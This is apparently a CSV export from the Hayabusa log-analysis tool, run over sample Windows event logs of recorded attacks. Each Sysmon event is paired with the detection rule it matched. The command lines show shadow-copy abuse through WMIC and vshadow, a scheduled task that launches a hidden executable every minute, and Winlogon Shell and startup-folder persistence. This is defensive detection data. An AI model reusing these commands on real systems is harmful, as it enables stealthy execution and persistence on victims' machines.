C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM 
| Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: 
SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx +2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: 
C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: 
SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | 
PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.707 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" 
